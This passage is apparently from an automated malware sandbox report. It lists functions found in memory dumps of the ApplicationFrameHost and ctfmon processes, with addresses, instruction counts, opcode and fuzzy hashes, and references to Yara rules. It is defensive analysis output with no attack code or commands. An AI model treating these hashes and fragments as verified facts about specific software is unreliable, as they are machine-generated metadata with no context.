Instruction Fuzzy Hash: AF017C3191D6899FE742FB7488592A97FE0EF6A750F4604B7D408DB0E6EB38A4448711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22eecbe54fe0cb3e7804a29ae1bce0dc80a6c23ec6cdec6adc2a67d3417e1cf9
Instruction ID: f3ffc43dc4e63e21e66d8fd6abc9e6c039388ab25f096b3bfa77127e0db8fce2
Opcode Fuzzy Hash: 22eecbe54fe0cb3e7804a29ae1bce0dc80a6c23ec6cdec6adc2a67d3417e1cf9
Instruction Fuzzy Hash: 9501693091860E9EEB59FBA484586BE7AA1FF28345F60087EE40ED21D1DF35A590C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af41eb60cda603a6f4c19a9b9a772ab453c0d1307fa3d8260b2376214e99334
Instruction ID: bb868f3190093210850f3154d1191cf9a9ee4a00bd7afce8ed0b0c5af7cbd05a
Opcode Fuzzy Hash: 6af41eb60cda603a6f4c19a9b9a772ab453c0d1307fa3d8260b2376214e99334
Instruction Fuzzy Hash: 21016930918A0E9FEB59EB6484592BDB7E0FF28345F20087FE40ED21D1DF39A550C614

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0da3de76ee3d48bb916061eca11683fc3d8f9f956905b3d35f28ede79ad190
Instruction ID: 42002dcc3f9552b7c6b2699d7b7df4f49da2da5d7d6a87580818cf059423d7a8
Opcode Fuzzy Hash: 9d0da3de76ee3d48bb916061eca11683fc3d8f9f956905b3d35f28ede79ad190
Instruction Fuzzy Hash: 7401AD3080D69D8FEB99EF2488552B93BA0FF65741F4401BAE808D21D2DB399490C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F405D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f03b64c41de2b98d88230dfec549a526cca3089ad8813b0ce672a25ef9e228c
Instruction ID: fc8720494a0a633004d9522744c1b5316c87087321820f00300cd903f8cc78fd
Opcode Fuzzy Hash: 6f03b64c41de2b98d88230dfec549a526cca3089ad8813b0ce672a25ef9e228c
Instruction Fuzzy Hash: F3F0C23080E65E8FEB44EF2498052FA77A4FF25349F10053AE80DD21C1DB39A4A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a45c2048a6374ea9f62a5d3b07bc5d405797b5af9fee9bd9f61356afde6ad64e
Instruction ID: 9331fb1bef328260021cb88450374fa32e4cea764c156c5536e099f4ff581be5
Opcode Fuzzy Hash: a45c2048a6374ea9f62a5d3b07bc5d405797b5af9fee9bd9f61356afde6ad64e
Instruction Fuzzy Hash: 46F0C23180E38A8FEB5AAF6488582A93F61FF26701F5504BBD409C61D2DB38A404C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F427CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e871c621b8b7b770c02ba3a1b3ceb79e51975a53bb362657f1a78bff7911487f
Instruction ID: cb991cd6ff4d3f5321dbc34b0317e1c9249aec42cb1f8a66c9fa37092e6d827e
Opcode Fuzzy Hash: e871c621b8b7b770c02ba3a1b3ceb79e51975a53bb362657f1a78bff7911487f
Instruction Fuzzy Hash: 02F09A3181E68E8FEB59AF6488192BD7BA0FF26241F5505BBE809C60D2EB399454C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 6c5d3acea40b629729677d22d812f5cf73ec78ead578db8569acc776baa372dc
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: 0BE06D30E1D8164EEA647318808467461D1EF647A4FB88276F01CDA1E1EB2CECC3C208

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F451AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 93c248fdcfef05c52414fda2be3a277cffb0f78bfd57f1e62a18e9368a73f1cf
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: F9E09670D59E1D8EEBB5EB588C54BB9B6B1BB58642F5010EBC00DF2291DE356A809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2090605094.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_ApplicationFrameHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bccbf28f8f7eeb98d0003ea71a558d545f2ac6ec711c43106d53367733f742
Instruction ID: 0e42128caaf0b2fb5e1dbd99571bc3ca4646590e5a51793588071e1a7157fa6b
Opcode Fuzzy Hash: 49bccbf28f8f7eeb98d0003ea71a558d545f2ac6ec711c43106d53367733f742
Instruction Fuzzy Hash: 68E0EC30D1A5198EE750FB14D800BAEAAB1FF54344F5001B6D00DE32C2CF386D408F54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ctfmon.exePID: 6304, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F5139C Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

., xrefs: 00007FF848F515CA
", xrefs: 00007FF848F51602
/, xrefs: 00007FF848F51870

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID: "$.$/
API String ID: 0-983106565
Opcode ID: d27661d4ddf4a26110aaeafd1b5ce34780b002c3b4bb51bf2f5a59ee203b1719
Instruction ID: 777ff322210f7d610d535fd23d7341f79a02cd0e85fc06992b1c52feff383347
Opcode Fuzzy Hash: d27661d4ddf4a26110aaeafd1b5ce34780b002c3b4bb51bf2f5a59ee203b1719
Instruction Fuzzy Hash: 2A31F330D086198FEB68EF54C8987EDB3B1FF55345F1045AAC41DAA292CB786A84CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4D9C9 Relevance: 2.9, Strings: 2, Instructions: 399COMMON

Download Yara Rule

Strings

NH, xrefs: 00007FF848F4DA74
p\H, xrefs: 00007FF848F4DAE2

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4d000_ctfmon.jbxd

Similarity

API ID:
String ID: NH$p\H
API String ID: 0-1232786254
Opcode ID: d6647fa70379e67e9a8cdb1b61bf37bb32abef6b1c183c0a0da35aeb7e5d38f3
Instruction ID: 3215b163047851266a8b2fb9c65395d272b6c0070329e4e03906c9f81d5e72c8
Opcode Fuzzy Hash: d6647fa70379e67e9a8cdb1b61bf37bb32abef6b1c183c0a0da35aeb7e5d38f3
Instruction Fuzzy Hash: C9E14B71D19A599FEB98EB68C4957B8B7B1FF68740F0441BAD00DE32D2CB386885CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F40A70

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 013f8e2137b00cd96c48b1f2c058317357d0d88bac2ca5740d7f08bf87664a62
Instruction ID: 0435be53d85d77cb9ff6e52afa0fb6e6f4d959718feb2ea44490a41b52630cb1
Opcode Fuzzy Hash: 013f8e2137b00cd96c48b1f2c058317357d0d88bac2ca5740d7f08bf87664a62
Instruction Fuzzy Hash: 68115B31D1854E9EE780FB68C8491B97BE0FFA8780F4005B6D818E61D2EF78A5448744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F411FD

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 19c0f3703c940419f7f078a5a89e102f2f056818d98e0b61fde6701bcd3d64d8
Instruction ID: 0f8906c84f54b0f665b2d43f7cafa5738e7939d1f09745441ff8c20e2e2bd6c0
Opcode Fuzzy Hash: 19c0f3703c940419f7f078a5a89e102f2f056818d98e0b61fde6701bcd3d64d8
Instruction Fuzzy Hash: 0311BF71D0CA5A4EEB59EB6488692B97BE0FFA5341F1504BFC40AE60D2EB286580C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F411A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F411FD

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 1b31ba016897ce242aefd6887328d4f24c615e083c424944c633886756598f6b
Instruction ID: eaf0ac8958caa7dd5a940d5518fc474c1f4ed7a310d7c0165deb44609fa475b4
Opcode Fuzzy Hash: 1b31ba016897ce242aefd6887328d4f24c615e083c424944c633886756598f6b
Instruction Fuzzy Hash: E1F0C870D1CA6E4DFB54BB6498193F97AE4FFA5745F00143BD41AD20C1FF3415948644

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F532E4 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f945bfe5c92703dc584d1aa2fc27baf4cc0b168ffd5d52cdd8564f7c683b63c
Instruction ID: bcc4405cc5a361ac65f7a324d18d082584401bc7a2909d97e9c091cde4cfe448
Opcode Fuzzy Hash: 3f945bfe5c92703dc584d1aa2fc27baf4cc0b168ffd5d52cdd8564f7c683b63c
Instruction Fuzzy Hash: E3017C7190E6CA8EE752A73C48662B9BFB0AF13240F4804FAD089C70D3EA185948C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F5382F Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f445aaa3c3dcb33029dd1539d44ae65a9a8913f50d3bee05cb97c92815b70d22
Instruction ID: e165cd96a9babd634a6ce621af0b160a81b3ae542a3d54132af0279c4d80e87d
Opcode Fuzzy Hash: f445aaa3c3dcb33029dd1539d44ae65a9a8913f50d3bee05cb97c92815b70d22
Instruction Fuzzy Hash: 0B91F837A1E4659EE704BB7CB8955EABBA0FF853B9F040777D188CD083DA186046C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F416A8 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c30ad51c47b6893da2c4f1c836adfe35b64c3ed3b5ca41ae07ffd004e0d50e
Instruction ID: 99bde78aa04304ed55a1f879e33952cb3d75c1dae3404bbe93229062bf8080a6
Opcode Fuzzy Hash: d0c30ad51c47b6893da2c4f1c836adfe35b64c3ed3b5ca41ae07ffd004e0d50e
Instruction Fuzzy Hash: 6D91BE31A0CA5A8FDB58EF1898556B977E2FFA8B44F14017AD44DD32C2CE34AC42C785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F52A87 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b90687a1ca09852c7d79d20d0fe8cd3147eb18e2bc7e1e2e24d2bb2a1e16519
Instruction ID: af023c5ea31cd037fecca4121aeac26eaca5136e50146aa5b0c76e8f0bbaac00
Opcode Fuzzy Hash: 4b90687a1ca09852c7d79d20d0fe8cd3147eb18e2bc7e1e2e24d2bb2a1e16519
Instruction Fuzzy Hash: 6291A470D1851D8EEBA4EB98C855BEDBBB1FF68340F1042BAD41DE3292DF3469858B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F435FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c184f03ae0e3e1078ddd76ccee79a4ce9c212a910d52b0c80d68d0eedbdb4873
Instruction ID: c025e434697eea582e50558a0e849a6dbe2fca5c293cbeb7e9acd46c0a5857ae
Opcode Fuzzy Hash: c184f03ae0e3e1078ddd76ccee79a4ce9c212a910d52b0c80d68d0eedbdb4873
Instruction Fuzzy Hash: 93719C31D2D94E8FE794EB6CD8557A9BBE1FB99350F50027AC00DD32C6DBA818028B45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f12c54d31b2ed9bd3ec3923cc0e77a0c8523064bfbf60e4563804cf8d91e91
Instruction ID: 7e04ed1c89684be885447db59f006f0371867efaac9d63d0f34d0155f1990f33
Opcode Fuzzy Hash: 10f12c54d31b2ed9bd3ec3923cc0e77a0c8523064bfbf60e4563804cf8d91e91
Instruction Fuzzy Hash: 8351C131A0CA9A4FDB48EF1888545BA77E2FFA8B54F14017ED45AD32C2CF35E8428785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F431C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0272f29948dc232be4f659998fd7b5e0ef1e9591763262d1d66cd48d3f776c
Instruction ID: c8832106aac90ae593b35de43d8ee7c2d18b52be1e0ee6fcfd7bd9fcfe70c40a
Opcode Fuzzy Hash: 0f0272f29948dc232be4f659998fd7b5e0ef1e9591763262d1d66cd48d3f776c
Instruction Fuzzy Hash: 0D510530D0C61E8EEB54EBA8C458AFDBBB1EF68750F10407AD009E72D2DB38A944CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42085 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc0ca67807765e710dec8946fa972f3c7ab779e11103df1f8673198192df679
Instruction ID: 4f715b66ad8ab66ef4d2fa8482a5097ecc64fa5a837d5da8007c367d68befc4c
Opcode Fuzzy Hash: 7fc0ca67807765e710dec8946fa972f3c7ab779e11103df1f8673198192df679
Instruction Fuzzy Hash: E8414331E0DA4A4FE345EBB898491B8BBE1EF96790F0500BBD04DD71D3EF28A8418355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F528DC Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823ab07851a0598a56af0c8f823e6ef80e4f1f39641452681ea9cc073e55183c
Instruction ID: eb7df86b45393160ccb6884e32b867f2a572c0d9fdb9029dd4fcbd6c89bdb4ca
Opcode Fuzzy Hash: 823ab07851a0598a56af0c8f823e6ef80e4f1f39641452681ea9cc073e55183c
Instruction Fuzzy Hash: C441B570D186198FEB94EB58C894BACBBB1FF69340F4052AAD40DE3292DF346984DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F5267D Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b171834c7b0ce47ace55d32e5c94b86ddad9ea1438e92a0ef04459fb5dfc63c3
Instruction ID: 876d78fad368337d6c5e705f036e7ef75435a252fecc6eb8f75fbfb604902dad
Opcode Fuzzy Hash: b171834c7b0ce47ace55d32e5c94b86ddad9ea1438e92a0ef04459fb5dfc63c3
Instruction Fuzzy Hash: 63415C30D2965E9FEB44EB98D8556EEB7B1FF58301F10017AD409E3292DF386840CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BD69 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c666c0f8a94dd654904225c65fb74b02830a807e248177714a6dc85af3da24
Instruction ID: 02c50eb2aeacd12d4ffdab7b94615f70bc593b54d468fb59fd53dba6a874fa18
Opcode Fuzzy Hash: 67c666c0f8a94dd654904225c65fb74b02830a807e248177714a6dc85af3da24
Instruction Fuzzy Hash: 1D314570D1D6498FEB54EFA4C8946EDBBF1EF69300F14007AD009E7292DB38A940CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4AE88 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68922bc3f4961d7f7e344c3638079f40db66c071ea8de5c04cf7fd8b7e045c54
Instruction ID: dd08f51a2f00593976cbc89adac721d88ff5eb1a27c15c4c6ae80698b88dc3cb
Opcode Fuzzy Hash: 68922bc3f4961d7f7e344c3638079f40db66c071ea8de5c04cf7fd8b7e045c54
Instruction Fuzzy Hash: C331C172D0DA8A8FE701AB7888191F97BE0FF25790F0804BBC459D71D3EF2869948355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F539D3 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d9fa529d38636bcd8eb9350b0b0a214c4aecbaa767d1cff9c3ea91d964a2178
Instruction ID: 96afa04a9823d2ce4c2766166f7477b36fc6a6adbc162cbec2a2bce982a21626
Opcode Fuzzy Hash: 5d9fa529d38636bcd8eb9350b0b0a214c4aecbaa767d1cff9c3ea91d964a2178
Instruction Fuzzy Hash: BF213A36E0E58A9EF711BB2CAC552F9FFA0FF42365F4401BBC548CA083DA285444C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F432F5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bfff02ac6f88359475cd9af4e6ef36706143d885b7c6f248e0cacf8fdc40a6
Instruction ID: 83b20783a32c3373528e6a8765d1a1714b170f2a6821d04c7273c79f60249588
Opcode Fuzzy Hash: 58bfff02ac6f88359475cd9af4e6ef36706143d885b7c6f248e0cacf8fdc40a6
Instruction Fuzzy Hash: 9721BF31D0891D8FEB94EB98C494AECBBB1FFA8741F50417AD009E72D2DB386980DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F433CF Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817d3ba14326b1fd6d38e4036471c83a2373fd19a2ffd9be9c1a65c77dc6f080
Instruction ID: 382c1169bc744024b04c30840ebd18a0d448f8a9fd3a09f000dd0eef495f86a8
Opcode Fuzzy Hash: 817d3ba14326b1fd6d38e4036471c83a2373fd19a2ffd9be9c1a65c77dc6f080
Instruction Fuzzy Hash: 04216A3084D68A9FE743AB788858AA97FF0EF26340F0905FBD049C70B2EB389455C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2bd953b69afd03a90652d763b2c072f68e5fe054d98aeba4c4032ee9d7fd14
Instruction ID: 6504e29276991f6fdc1b5234a14f2f811dd8200722c6e377639624fa6d1f812a
Opcode Fuzzy Hash: 9b2bd953b69afd03a90652d763b2c072f68e5fe054d98aeba4c4032ee9d7fd14
Instruction Fuzzy Hash: 8611702184E2D14EEB23677818651616FD48F23674F2D46FBD0D8EB0E3D70D588AC316

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F523E1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915309000ee7d45736f45ab65cb4f4c8ed9c3d7e809c4b75a19e2ff6ca6cf4ec
Instruction ID: 8c4f8e80e2b261c783b92798ac89566dc9541759172ceb55926a9d0554030532
Opcode Fuzzy Hash: 915309000ee7d45736f45ab65cb4f4c8ed9c3d7e809c4b75a19e2ff6ca6cf4ec
Instruction Fuzzy Hash: 4B118E7090C6898FDB49EF18C4955E9BBE1FF58345F1502BEE80AC3292DB35A550CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54675 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec37112e4838e1b23a1d130563507485b5d526ced5d4e68e11f66f03a4902b9a
Instruction ID: 9dc72405109ad4a19bde8f0b1399c95833980e66bb872ad274811f8fc0cd9ca6
Opcode Fuzzy Hash: ec37112e4838e1b23a1d130563507485b5d526ced5d4e68e11f66f03a4902b9a
Instruction Fuzzy Hash: 03117F7090DA5E9FDB89EF6884592B9BBE0FF68341F0405BAD409C35D6DB78A490CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F545D9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04eb6e5ab90d60770bd52f31827683c8c8b1164dda792b3185d9a54da6d2cb12
Instruction ID: d5bdbef8f3fb34a8d685096d0b57090d985ea7b2e3694fc873ed3acc62269630
Opcode Fuzzy Hash: 04eb6e5ab90d60770bd52f31827683c8c8b1164dda792b3185d9a54da6d2cb12
Instruction Fuzzy Hash: DC218C7080DA8E9FDB89EF2884592BDBBA0FF69341F0405BBD419C71D2DB79A484CB41

Uniqueness

Uniqueness Score: -1.00%

